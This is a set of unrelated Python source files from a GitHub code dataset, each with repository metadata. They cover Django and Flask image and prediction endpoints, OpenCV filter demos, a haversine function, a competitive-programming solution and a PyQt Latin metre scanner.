buttons.woman.callback = user_like_woman\n buttons.man.callback = user_like_man\n self.add_item(buttons.woman)\n self.add_item(buttons.man)\n","repo_name":"BladeXses21/Raffael-Discord-DatingBot","sub_path":"main/src/templates/views/like_gender_view_builder.py","file_name":"like_gender_view_builder.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"26609864951","text":"from sklearn.svm import SVC\n\nfrom data_preparation import load\nfrom training import select_model\n\nif __name__ == '__main__':\n digit1, digit2 = 8, 5\n dataset = load(digit1, digit2)\n parameters = {\n 'kernel': ['sigmoid', 'rbf', 'poly'],\n 'degree': [3, 4, 5],\n }\n select_model(dataset, SVC, parameters)\n","repo_name":"Pavlik1400/MLLL_project","sub_path":"src/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15278700111","text":"from math import radians, cos, sin, asin, sqrt\n\n\n__all__ = [\"haversine\"]\n\n\ndef haversine(\n lat1: float,\n lon1: float,\n lat2: float,\n lon2: float,\n) -> float:\n \"\"\"\n Example:\n lon1 = -103.548851\n lat1 = 32.0004311\n lon2 = -103.6041946\n lat2 = 33.374939\n\n haversine(lat1, lon1, lat2, lon2)\n 95.05067505558074\n \"\"\"\n # this is in miles\n # For Earth radius in kilometers use 6372.8 km\n R = 3959.87433\n\n dLat = radians(lat2 - lat1)\n dLon = radians(lon2 - lon1)\n lat1 = radians(lat1)\n lat2 = radians(lat2)\n\n a = (\n sin(dLat / 2) ** 2\n + cos(lat1) * cos(lat2) * sin(dLon / 2) ** 2\n )\n c = 2 * asin(sqrt(a))\n\n return R * c\n","repo_name":"kremrik/performant-python","sub_path":"performant_python/cython/haversine/haversine_python.py","file_name":"haversine_python.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71397048364","text":"from django.shortcuts import render\n\n# Create your views here.\n# views.py\nfrom rest_framework import viewsets\n\nfrom .serializers import HeroSerializer\nfrom .models import Hero\n\n\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\n\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nimport socket\nimport sys\nimport PIL\nfrom PIL import Image\nfrom io import BytesIO\nimport base64\n\nclass HeroViewSet(viewsets.ModelViewSet):\n queryset = Hero.objects.all().order_by('name')\n serializer_class = HeroSerializer\n \n \n# def get(self, request):\n# a = 1+1\n# return HttpResponse('Albinos'+a) # Redirect after POST\n@csrf_exempt\ndef login(request):\n if request.method == 'POST':\n # Your code for POST\n a = json.loads(request.body)\n stringImagen = str(a['base64'])\n\n # ------------------------ RESIZE IMAGEN -------------------#\n # adjust width and height to your needs\n width = 240\n height = 320\n\n im1 = PIL.Image.open(BytesIO(base64.b64decode(stringImagen)))\n\n im1.save(\"imagenBase64.jpg\")\n\n # use one of these filter options to resize the image\n im2 = im1.resize((width, height), PIL.Image.NEAREST) # use nearest neighbour\n \n im2.save(\"resized.jpg\")\n\n # ------------------------ MAPEO RGB -----------------------#\n\n rojo = list(im2.getdata(band=0))\n verde = list(im2.getdata(band=1))\n azul = list(im2.getdata(band=2))\n\n file = open(\"rgb.txt\",\"w+\")\n posX = 0\n posY = 1\n lista = []\n\n for x in range(0,len(rojo)):\n\n posX += 1\n\n if rojo[x] > verde[x] and rojo[x] > azul[x]:\n file.write(\"R\")\n lista.insert(x, str(posX)+\"R\"+str(posY)+\"\\n\")\n elif verde[x] > rojo[x] and verde[x] > azul[x]:\n file.write(\"G\")\n lista.insert(x, str(posX)+\"G\"+str(posY)+\"\\n\")\n elif azul[x] > verde[x] and azul[x] > rojo[x]:\n file.write(\"B\")\n lista.insert(x, str(posX)+\"B\"+str(posY)+\"\\n\")\n else:\n file.write(\" \")\n\n if posX == 240:\n file.write(\"\\n\")\n lista.insert(x, \"|\\n\")\n posY +=1\n posX = 0\n\n \n #file.write('\\n'.join(map(str, pixels)))\n\n file.close()\n \n file2 = open(\"listaRGB.txt\",\"w+\")\n\n file2.write(''.join(map(str, lista)))\n\n file2.close()\n\n with open('listaRGB.txt', 'r') as file:\n data = file.read()\n\n\n # ------------------------ ENVÍO POR UPD ------------------ #\n\n # UPD_IP = \"192.168.1.9\"\n # UPD_PORT = 4210\n # MESSAGE = stringImagen\n\n # chunks, chunk_size = len(stringImagen), len(stringImagen)//4\n # [ stringImagen[i:i+chunk_size] for i in range(0, chunks, chunk_size) ]\n\n # sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # sock.sendto(bytes(MESSAGE, \"utf-8\"), (UPD_IP, UPD_PORT))\n\n # ------------------------ ENVÍO POR TCP ------------------ #\n TCP_IP = '192.168.1.13'\n TCP_PORT = 5005\n BUFFER_SIZE = 2\n #MESSAGE = data;\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((TCP_IP, TCP_PORT))\n for x in range(0,len(lista)):\n s.send(lista[x].encode('utf-8'))\n if x != (len(lista)-1) :\n dataRcv = s.recv(BUFFER_SIZE)\n print((\"\"+str(dataRcv)), file=sys.stderr)\n\n \n #print(\"Goodbye cruel world!\", file=sys.stderr)\n \n print((\"Texto Correcto\"), file=sys.stderr)\n \n s.close()\n\n return HttpResponse('Recibio POST : '+str(a['base64']))\n else:\n # Your code for GET\n return HttpResponse('Recibio GET')\n \n\nfrom .serializers import ImagenSerializer\nfrom .models import Image\n\n\nclass ImagenViewSet(viewsets.ModelViewSet):\n queryset = Image.objects.all()\n serializer_class = ImagenSerializer\n #return HttpResponse(\"Entro Imagen.\")\n\n\n","repo_name":"LuisLVar/Django-TCP","sub_path":"myapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3147424026","text":"import base64\n\nfrom flask import Flask, request, json \nfrom flask_restful import Resource, Api\n\nfrom classifier import CarDamageClassification\n\napp = Flask(__name__)\napi = Api(app)\n\nmodel = CarDamageClassification('models/')\n\nclass CarDamage(Resource):\n def get(self):\n return {'response': 'Use post method'}\n \n def post(self):\n if request.headers['Content-Type'] == 'application/image':\n req = request.data\n image_decoded = base64.b64decode(req)\n #print(type(image_decoded))\n response = model.predict(image_decoded)\n \n return response\n\n else:\n return {'response': 'Incorrect header'}\n\n\napi.add_resource(CarDamage, '/predict')\n\nif __name__ == '__main__':\n app.run(debug=False, host='0.0.0.0', port=7000)\n","repo_name":"kendalvictor/accident_severity_detection","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72461221802","text":"#백준 2116- 주사위 쌓기\n#위아래 주사위의 맞댄 면의 숫자가 같아야함\n#모두 쌓았을 때, 주사위별 4 옆면의 숫자합이 최대\n#첫 번째 주사위는 막 놓을 수 있음\nfrom sys import stdin\ninput=stdin.readline\nn=int(input()) #주사위 수\ndice=[]\nrotate={0:5,1:3,2:4,3:1,4:2,5:0} #반대편 면\nfor i in range(n):\n dice.append(list(map(int,input().split())))\n\nmaxsum=0\nfor i in range(6): #첫 번째 주사위의 i번째 면을 위로 둘 때\n temp=[1,2,3,4,5,6] #옆면이 될 수 있는 값\n upper=dice[0][i]\n temp.remove(dice[0][i]) #윗면의 수 제거\n temp.remove(dice[0][rotate[i]]) #아랫면의 수 제거\n sum=max(temp)\n for j in range(1,n): #두 번째부터 마지막\n temp=[1,2,3,4,5,6]\n temp.remove(upper) #아랫면의 수 제거\n up_idx=rotate[dice[j].index(upper)] #윗면의 인덱스\n upper=dice[j][up_idx] #윗면의 수\n temp.remove(upper) #윗면의 수 제거\n sum+=max(temp)\n if(j==n-1 and sum>maxsum): maxsum=sum\nprint(maxsum)\n\n","repo_name":"jinyoung7165/Python_Algorithm_Basic","sub_path":"01Greedy/2116.py","file_name":"2116.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27271860573","text":"from test.test_converters.resources.new_order_single import new_order_single_message\n\nfrom th2_common_utils.message_fields_access import * # noqa: F401, F403\n\n\ndef test_message_fields_access() -> None:\n party_id_source = new_order_single_message.fields['TradingParty'].message_value.fields['NoPartyIDs']. \\\n list_value.values[1].message_value.fields['PartyIDSource'].simple_value # noqa: ECE001\n\n party_id_source_easy_access = new_order_single_message['TradingParty']['NoPartyIDs'][1]['PartyIDSource']\n\n assert party_id_source_easy_access == party_id_source\n","repo_name":"th2-net/th2-common-utils-py","sub_path":"test/test_message_fields_access/test_message_fields_access.py","file_name":"test_message_fields_access.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"31996740763","text":"import math\n\n\nclass Punkt:\n def __init__(self, x_wart, y_wart, nazwa=\"p\"):\n self.x = x_wart\n self.y = y_wart\n self.nazwa = nazwa\n\n def __str__(self):\n return \"Punkt \" + self.nazwa + \"(\" + str(self.x) + \", \" + str(self.y) + \")\"\n\n\nclass Przeciecia:\n # pomiędzy poszczególnymi punktami są linie proste na wykresie\n # więc punkty przecięcia wykresów można znaleźć sprawdzając każdą taką\n # krótką linię pomiędzy dwoma punktami dla obu funkcji i szukając,\n # czy się przetną pomiędzy tymi dwoma argumentami\n def przeciecia_punkty(self, krzywa1, krzywa2, przesuniecie=0):\n n = len(krzywa1)\n punkty = []\n x_ret = []\n y_ret = []\n for i in range(n - 1):\n p1k1 = Punkt(i + przesuniecie, krzywa1[i])\n p2k1 = Punkt(i + 1 + przesuniecie, krzywa1[i + 1])\n p1k2 = Punkt(i + przesuniecie, krzywa2[i])\n p2k2 = Punkt(i + 1 + przesuniecie, krzywa2[i + 1])\n a1, b1 = self.wyznacz_funkcje_liniowa(p1k1, p2k1)\n a2, b2 = self.wyznacz_funkcje_liniowa(p1k2, p2k2)\n if (a1 - a2) != 0:\n x = (b2 - b1) / (a1 - a2) # argument, dla którego wystąpiło przecięcie\n if i + przesuniecie <= x < i + 1 + przesuniecie:\n y = a1 * x + b1\n punkty.append(Punkt(x, y))\n x_ret.append(x)\n y_ret.append(y)\n\n return x_ret, y_ret\n\n def wyznacz_funkcje_liniowa(self, p1, p2):\n # współczynnik kierunkowy a\n a = (p1.y - p2.y) / (p1.x - p2.x)\n # przesunięcie\n b = p1.y - a * p1.x\n return a, b\n\n def zaokraglone_w_gore_arg_przec(self, punkty_x):\n x_zaokr = []\n for x in punkty_x:\n x_zaokr.append(math.ceil(x)) # najbliższy następny dzień po przecięciu MACD i SIGNAL\n return x_zaokr\n","repo_name":"WonderWoman2020/MN-projekt-1","sub_path":"przeciecia.py","file_name":"przeciecia.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13362640014","text":"class Solution(object):\n def permute(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n if not nums:\n return []\n ans = [[nums[0]]]\n for v in nums[1:]:\n tmp = []\n for l in ans:\n for i in xrange(len(l)+1):\n tmp.append(l[:i]+[v]+l[i:])\n ans = tmp\n return ans\n","repo_name":"ynXiang/LeetCode","sub_path":"046.Permutations/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6634325764","text":"# Variable scope in python\n\n# A Variable scope is only available from inside the region it is created\n\n# global sxope = variable available from within any scope\n\n# local variable = variable created inside function\n\ncalculate_to_hours = 24\nname_of_unit = \"hours\"\n\n# def days_to_units(num_of_days, custom_message):\n# print(f\"{num_of_days} days have {num_of_days * calculate_to_hours} {name_of_unit}\")\n# print(custom_message)\n\n# days_to_units(35, \"Awesome\")\n# days_to_units(50, \"Fantastic\")\n# days_to_units(60, \"Great\")\n# days_to_units(20, \"Excellent\")\n\ndef scope_check():\n my_var = \"variable inside function\"\n print(name_of_unit) # global variable accessible\n print(my_var)\n\nscope_check()\n","repo_name":"11anil/python","sub_path":"Scope.py","file_name":"Scope.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7339504051","text":"import cv2\nimport numpy as np\nimg = cv2.imread('lena_color_256.tif',1)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nrows,cols = img.shape[:2]\ncv2.imshow('Original',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#edge enhancement\nkernel_sharpen_3 = np.array([[-1,-1,-1,-1,-1],[-1,2,2,2,-1],[-1,2,8,2,-1],[-1,2,2,2,-1],[-1,-1,-1,-1,-1]])/8.0\noutput3=cv2.filter2D(img,-1,kernel_sharpen_3)\ncv2.imshow('Edge Enhancement',output3)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#emboss\nkernel_emboss1=np.array([[0,-1,1],[1,0,-1],[1,1,0]])\noutput=cv2.filter2D(gray,-1,kernel_emboss1)+128\ncv2.imshow('Emboss1',output)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#emboss2\nkernel_emboss2=np.array([[-1,-1,0],[-1,0,11],[0,1,1]])\noutput=cv2.filter2D(gray,-1,kernel_emboss2)+128\ncv2.imshow('Emboss2',output)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#emboss3\nkernel_emboss3=np.array([[1,0,0],[0,0,0],[0,0,-1]])\noutput=cv2.filter2D(gray,-1,kernel_emboss3)+128\ncv2.imshow('Emboss3',output)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#Sobel\nsobel_horizontal = cv2.Sobel(img,cv2.CV_64F, 1,0,ksize=5)\ncv2.imshow('Sobel horizontal',sobel_horizontal)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#Sobel2\nsobel_vertical = cv2.Sobel(img,cv2.CV_64F, 1,0,ksize=5)\ncv2.imshow('Sobel vertical',sobel_vertical)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#erode\nkernel_erode=np.ones((5,5),np.uint8)\nimg_erosion = cv2.erode(img,kernel_erode,iterations = 1)\ncv2.imshow('Erode',img_erosion)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#dilate\nimg_dilatation = cv2.dilate(img,kernel_erode,iterations = 1)\ncv2.imshow('Dilate',img_dilatation)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#vignette\nkernel_gauss_x= cv2.getGaussianKernel(cols,200)\nkernel_gauss_y = cv2.getGaussianKernel(rows,200)\nkernel = kernel_gauss_y * kernel_gauss_x.T\nmask=255*kernel/np.linalg.norm(kernel)\noutput=np.copy(img)\nfor i in range(3):\n output[:,:,i]=output[:,:,i] * mask\ncv2.imshow('Vignette',output)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"SidhantAbap/ImageProcessing","sub_path":"Convolution/Edge.py","file_name":"Edge.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"5259109158","text":"from flask import Flask, Blueprint, render_template, request, app, redirect, url_for\nimport pickle\nimport json\nimport numpy as np\nimport pandas as pd \nimport sklearn\nfrom flask import Response\nfrom flask_cors import CORS\nfrom sklearn.preprocessing import StandardScaler\n\nstudentgrd = Blueprint('studentg', __name__)\n\n@studentgrd.route(\"/studentg\")\ndef studentg():\n return render_template('students_grad.html')\n\n@studentgrd.route(\"/predict\", methods=['POST'])\ndef studentgroute():\n try:\n if request.json['data'] is not None:\n data = request.json['data']\n print('data is: ', data)\n res = predict_log(data)\n print('result is ', res)\n return Response(res)\n except ValueError:\n return Response(\"Value not found\")\n except Exception as e:\n print('exception is ', e)\n return Response(e)\n\n# studentsandardScalar.sav StudentGradingmodelForPrediction.sav\ndef predict_log(dict_pred): \n with open(\"studentsandardScalar.sav\", 'rb') as f:\n scalar = pickle.load(f)\n\n with open(\"StudentGradingmodelForPrediction.sav\", 'rb') as f:\n model = pickle.load(f)\n\n data_df = pd.DataFrame(dict_pred, index=[1, ])\n scaled_data = scalar.transform(data_df)\n predict = model.predict(scaled_data)\n if predict[0] == 0:\n result = 'Very Poor'\n elif predict[0] == 1:\n result = 'Poor'\n elif predict[0] == 2:\n result = 'Below Average'\n elif predict[0] == 3:\n result = 'Average'\n elif predict[0] == 4:\n result = 'Very Good'\n else:\n result = 'Excellent'\n\n return result\n\n@studentgrd.route(\"/spridict\", methods=['POST'])\ndef spridict():\n if request.method == \"POST\":\n cse_math_score = request.form['cse_math_score']\n eee_score = request.form['eee_score']\n cse_deploy_score = request.form['cse_deploy_score']\n math_score = request.form['math_score']\n\n sprediction = predict_log(np.array([[cse_math_score, eee_score, cse_deploy_score, math_score]]))\n\n return render_template('students_grad.html', sprediction=\"Your Result is {}\".format(sprediction))\n else:\n return render_template('students_grad.html')\n\n\n\nif __name__ == '__main__':\n studentgrd.run(debug=True)\n","repo_name":"shariat-sunny14/ML-Al-Projects-in-One","sub_path":"studentg.py","file_name":"studentg.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12863265721","text":"import cv2\nimport numpy as np\nd=cv2.imread(\"D://opencv//d.jpg\")\nhsv=cv2.cvtColor(d,cv2.COLOR_BGR2HSV)\ncv2.imshow(\"d\",d)\ncv2.imshow(\"hsv\",hsv) \nminBule=np.array([50,100,100]) \nmaxBule=np.array([70,255,255])\nmask = cv2.inRange(hsv,minBule,maxBule)\nblue=cv2.bitwise_and(d,d,mask=mask)\ncv2.imshow(\"blue\",blue)\ncv2.waitKey()\ncv2.destroyAllWindows() \n","repo_name":"cristiano-xw/python","sub_path":"python/显示特定颜色.py","file_name":"显示特定颜色.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8721598985","text":"import os\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom core import *\n\n\nclass Form(QWidget):\n def __init__(self, parent=None):\n super(Form, self).__init__(parent)\n self.sorgente = \"\"\n self.versiDaFare = \"\"\n self.sorgente = \"\"\n self.scrivi = QTextEdit()\n self.scrivi.setMinimumHeight(250)\n self.risultato = QTextEdit()\n self.risultato.setMinimumHeight(250)\n self.setMinimumWidth(650)\n\n scegliFileLayout = QHBoxLayout()\n scegliButton = QPushButton(\"Apri..\")\n scegliButton.clicked.connect(self.scegliFile)\n self.tField = QLineEdit()\n self.tField.setDisabled(1)\n self.tField.textChanged.connect(self.cambiaPercorso)\n btnRisolvi = QPushButton(\"RISOLVI\")\n btnRisolvi.clicked.connect(self.iniziaRisoluzione)\n scegliFileLayout.addWidget(scegliButton)\n scegliFileLayout.addWidget(self.tField)\n self.listaVersi = QComboBox()\n self.listaVersi.setEditable(True)\n self.listaVersi.completer().setCompletionMode(QCompleter.PopupCompletion)\n self.listaVersi.completer().popup().setStyleSheet(\"margin: 5px\")\n self.listaVersi.addItem(\"--Scegli verso--\")\n self.listaVersi.insertSeparator(1)\n self.listaVersi.addItem(\"Esametro\")\n self.listaVersi.addItem(\"Pentametro\")\n self.listaVersi.insertSeparator(4)\n self.listaVersi.addItem(\"Endecasillabo falecio\")\n self.listaVersi.addItem(\"Trimetro giambico scazonte\")\n self.listaVersi.addItem(\"Asclepiadeo maggiore\")\n self.listaVersi.addItem(\"Asclepiadeo minore\")\n self.listaVersi.addItem(\"Endecasillabo saffico\")\n self.listaVersi.addItem(\"Adonio\")\n self.listaVersi.addItem(\"Gliconeo\")\n self.listaVersi.addItem(\"Ferecrateo\")\n self.listaVersi.insertSeparator(13)\n self.listaVersi.addItem(\"Enneasillabo alcaico\")\n self.listaVersi.addItem(\"Decasillabo alcaico\")\n self.listaVersi.addItem(\"Endecasillabo alcaico\")\n self.listaVersi.insertSeparator(17)\n self.listaVersi.addItem(\"Distico elegiaco\")\n self.listaVersi.addItem(\"Strofe saffica\")\n self.listaVersi.addItem(\"Strofe alcaica\")\n self.listaVersi.addItem(\"Strofe di gliconei e ferecratei I\")\n self.listaVersi.addItem(\"Strofe di gliconei e ferecratei II\")\n self.listaVersi.addItem(\"Prima strofe asclepiadea\")\n self.listaVersi.addItem(\"Seconda strofe asclepiadea\")\n mainLayout = QFormLayout()\n mainLayout.addRow(QLabel(\"Verso/strofa\"), self.listaVersi)\n mainLayout.addRow(QLabel(\"Scegli file\"), scegliFileLayout)\n mainLayout.addRow(None, QLabel(\"oppure\"))\n cleanLayout = QVBoxLayout()\n btnClear = QPushButton(\"Pulisci\")\n btnClear.clicked.connect(self.pulisciTesto)\n cleanLayout.addWidget(QLabel(\"Scrivi testo\"))\n cleanLayout.addStretch(1)\n cleanLayout.addWidget(btnClear)\n cleanLayout.setAlignment(Qt.AlignTop)\n layoutTemp = QHBoxLayout()\n layoutTemp.addLayout(cleanLayout)\n layoutTemp.addWidget(self.scrivi)\n salvaLayout = QVBoxLayout()\n btnSalva = QPushButton(\"Salva\")\n btnSalva.clicked.connect(self.salvaRisultato)\n layoutTempSalva = QHBoxLayout()\n salvaLayout.addWidget(QLabel(\"Risultato\"))\n salvaLayout.addStretch(1)\n salvaLayout.addWidget(btnSalva)\n salvaLayout.setAlignment(Qt.AlignTop)\n layoutTempSalva.addLayout(salvaLayout)\n layoutTempSalva.addWidget(self.risultato)\n mainLayout.addRow(layoutTemp)\n mainLayout.addRow(None, btnRisolvi)\n mainLayout.addRow(layoutTempSalva)\n self.setLayout(mainLayout)\n self.setWindowTitle(\"Metrica Latina\")\n\n def salvaRisultato(self):\n try:\n fname = QFileDialog.getSaveFileName(\n self, 'Salva file', \"output.txt\", \"File di testo (*.txt)\")\n out_file = open(fname[0], \"w\")\n daScrivere = self.risultato.toPlainText().replace(\"\", \"\").replace(\"\", \"\")\n out_file.write(daScrivere)\n out_file.close()\n except Exception:\n self.mostraErrore(\"Si è verificato un errore!\")\n else:\n self.mostraErrore(\"Salvataggio avvenuto con successo!\", 2, \"Info\")\n\n def cambiaPercorso(self):\n self.sorgente = self.tField.text().replace(\"...\", os.getcwd())\n\n def pulisciTesto(self):\n self.scrivi.setText(\"\")\n\n def mostraErrore(self, testo, tipo=0, titolo=\"Errore!\"):\n msg = QMessageBox()\n if tipo == 0:\n msg.setIcon(QMessageBox.Warning)\n elif tipo == 1:\n msg.setIcon(QMessageBox.Critical)\n elif tipo == 2:\n msg.setIcon(QMessageBox.Information)\n msg.setText(testo)\n msg.setWindowTitle(titolo)\n msg.setStandardButtons(QMessageBox.Ok)\n msg.buttonClicked.connect(msg.close)\n msg.exec_()\n\n def iniziaRisoluzione(self):\n self.risultato.setPlainText(\"\")\n if self.scrivi.toPlainText() != \"\":\n self.versiDaFare = self.scrivi.toPlainText().split(\"\\n\")\n else:\n self.mostraErrore(\n \"Nessuna sorgente valida selezionata. \\n Scegliere una sorgente valida.\")\n return\n scriviFuturo = []\n count = 0\n for versoOriginale in self.versiDaFare:\n if self.listaVersi.currentText() == \"Esametro\":\n verso = Esametro(versoOriginale)\n if self.listaVersi.currentText() == \"--Scegli verso--\":\n self.mostraErrore(\n \"Scegli un tipo di verso prima di continuare\")\n return\n if self.listaVersi.currentText() == \"Pentametro\":\n verso = Pentametro(versoOriginale)\n if self.listaVersi.currentText() == \"Endecasillabo saffico\":\n verso = EndecasillaboSaffico(versoOriginale)\n if self.listaVersi.currentText() == \"Adonio\":\n verso = Adonio(versoOriginale)\n if self.listaVersi.currentText() == \"Endecasillabo alcaico\":\n verso = EndecasillaboAlcaico(versoOriginale)\n if self.listaVersi.currentText() == \"Decasillabo alcaico\":\n verso = DecasillaboAlcaico(versoOriginale)\n if self.listaVersi.currentText() == \"Enneasillabo alcaico\":\n verso = EnneasillaboAlcaico(versoOriginale)\n if self.listaVersi.currentText() == \"Ferecrateo\":\n verso = Ferecrateo(versoOriginale)\n if self.listaVersi.currentText() == \"Gliconeo\":\n verso = Gliconeo(versoOriginale)\n if self.listaVersi.currentText() == \"Trimetro giambico scazonte\":\n verso = TrimetroGiambicoScazonte(versoOriginale)\n if self.listaVersi.currentText() == \"Endecasillabo falecio\":\n verso = EndecasillaboFalecio(versoOriginale)\n if self.listaVersi.currentText() == \"Asclepiadeo minore\":\n verso = AsclepiadeoMinore(versoOriginale)\n if self.listaVersi.currentText() == \"Asclepiadeo maggiore\":\n verso = AsclepiadeoMaggiore(versoOriginale)\n if self.listaVersi.currentText() == \"Distico elegiaco\":\n if count % 2 == 0:\n verso = Esametro(versoOriginale)\n count += 1\n else:\n verso = Pentametro(versoOriginale)\n count += 1\n\n if self.listaVersi.currentText() == \"Strofe saffica\":\n if count % 4 != 3:\n verso = EndecasillaboSaffico(versoOriginale)\n count += 1\n else:\n verso = Adonio(versoOriginale)\n count += 1\n if self.listaVersi.currentText() == \"Strofe di gliconei e ferecratei I\":\n if count % 4 != 3:\n verso = Gliconeo(versoOriginale)\n count += 1\n else:\n verso = Ferecrateo(versoOriginale)\n count += 1\n if self.listaVersi.currentText() == \"Strofe di gliconei e ferecratei II\":\n if count % 5 != 4:\n verso = Gliconeo(versoOriginale)\n count += 1\n else:\n verso = Ferecrateo(versoOriginale)\n count += 1\n\n if self.listaVersi.currentText() == \"Strofe alcaica\":\n if count % 4 == 0 or count % 4 == 1:\n verso = EndecasillaboAlcaico(versoOriginale)\n count += 1\n elif count % 4 == 2:\n verso = EnneasillaboAlcaico(versoOriginale)\n count += 1\n else:\n verso = DecasillaboAlcaico(versoOriginale)\n count += 1\n\n if self.listaVersi.currentText() == \"Prima strofe asclepiadea\":\n if count % 4 != 3:\n verso = AsclepiadeoMinore(versoOriginale)\n count += 1\n else:\n verso = Gliconeo(versoOriginale)\n count += 1\n if self.listaVersi.currentText() == \"Seconda stofe asclepiadea\":\n if count % 4 == 0 or count % 4 == 1:\n verso = AsclepiadeoMinore(versoOriginale)\n count += 1\n elif count % 4 == 2:\n verso = Ferecrateo(versoOriginale)\n count += 1\n else:\n verso = Gliconeo(versoOriginale)\n count += 1\n try:\n verso.dividiInSillabe()\n soluzioni = verso.risolvi()\n except VersoIncompatibile:\n self.mostraErrore(\n \"Il tipo di verso selezionato non è compatibile con i versi della sorgente. \\nControllare che non vi siano errori nella sorgente e che il tipo di verso selezionato sia corretto.\", 1)\n self.risultato.setPlainText(\"\")\n break\n else:\n soluzioni = [x.replace(\"à\", \"à\")\n for x in soluzioni]\n soluzioni = [x.replace(\"è\", \"è\")\n for x in soluzioni]\n soluzioni = [x.replace(\"ì\", \"ì\")\n for x in soluzioni]\n soluzioni = [x.replace(\"ò\", \"ò\")\n for x in soluzioni]\n soluzioni = [x.replace(\"ù\", \"ù\")\n for x in soluzioni]\n soluzioni = [x.replace(\"À\", \"À\")\n for x in soluzioni]\n soluzioni = [x.replace(\"È\", \"È\")\n for x in soluzioni]\n soluzioni = [x.replace(\"Ì\", \"Ì\")\n for x in soluzioni]\n soluzioni = [x.replace(\"Ò\", \"Ò\")\n for x in soluzioni]\n soluzioni = [x.replace(\"Ù\", \"Ù\")\n for x in soluzioni]\n soluzioni = [x.replace(\"Ý\", \"Ý\")\n for x in soluzioni]\n soluzioni = [x.replace(\"ý\", \"ý\")\n for x in soluzioni]\n if len(soluzioni) == 0:\n self.risultato.append(\n \"\\t NESSUNA SOLUZIONE (\"+str(verso)+\")\")\n if len(soluzioni) == 1:\n self.risultato.append(soluzioni[0])\n else:\n [self.risultato.append(\"....\"+str(x)) for x in soluzioni]\n\n # self.risultato.setPlainText(\"\\n\".join(scriviFuturo))\n\n def scegliFile(self):\n fname = QFileDialog.getOpenFileName(\n self, 'Apri file', \"input.txt\", \"File di testo (*.txt)\")\n self.tField.setDisabled(0)\n self.tField.setText(fname[0].replace(os.getcwd(), \"...\"))\n self.sorgente = fname[0]\n if(os.path.isfile(self.sorgente)):\n file = open(self.sorgente)\n self.versiDaFare = [x.strip() for x in file.readlines()]\n if self.versiDaFare[0][0] == \"#\":\n index = self.listaVersi.findText(self.versiDaFare[0][1:])\n if index == -1:\n self.mostraErrore(\n \"Il tipo di verso specificato nel file non esiste. Controllare che sia scritto correttamente\")\n return\n self.listaVersi.setCurrentIndex(index)\n self.versiDaFare = self.versiDaFare[1:]\n self.scrivi.setPlainText(\"\\n\".join(self.versiDaFare))\n else:\n self.mostraErrore(\n \"Il file selezionato non esiste! \\n Scegliere un file esistente.\")\n return\n\n\nif __name__ == '__main__':\n import sys\n app = QApplication(sys.argv)\n screen = Form()\n screen.show()\n sys.exit(app.exec_())\n","repo_name":"CiccaGuru/metricalatina","sub_path":"Interfaccia.py","file_name":"Interfaccia.py","file_ext":"py","file_size_in_byte":13376,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"30716010073","text":"import pandas as pd\nimport re\nfrom datetime import datetime as dt\n\ndef create_figure(df):\n return {\n 'data': [\n dict(\n x= df.index,\n y= df[col],\n mode= 'lines',\n name= col,\n type= 'scatter',\n opacity= 0.7\n ) for col in df.columns\n ],\n 'layout': {\n 'transition': {'duration': 500},\n 'margin': {'l': 20, 'b': 20, 't': 20, 'r': 10},\n 'legend': {'x': 0 , 'yref': 'paper', 'y': 1, 'xref': 'paper', 'bgcolor': 'rgba(0,0,0,0)'}\n }\n }\n \n\"\"\"\n'title': {\n 'text': 